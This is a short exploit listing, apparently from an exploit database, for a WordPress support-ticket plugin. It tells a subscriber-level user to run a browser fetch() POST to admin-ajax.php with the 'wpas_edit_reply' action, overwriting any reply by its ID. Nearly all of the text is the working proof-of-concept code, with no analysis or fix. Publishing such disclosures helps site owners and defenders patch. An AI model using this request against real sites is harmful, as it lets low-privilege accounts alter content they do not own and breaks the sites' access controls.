## https://sploitus.com/exploit?id=WPEX-ID:D32B2136-D923-4F36-BD76-AF4578DEB23B
Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
"method": "POST",
"credentials": "include"
});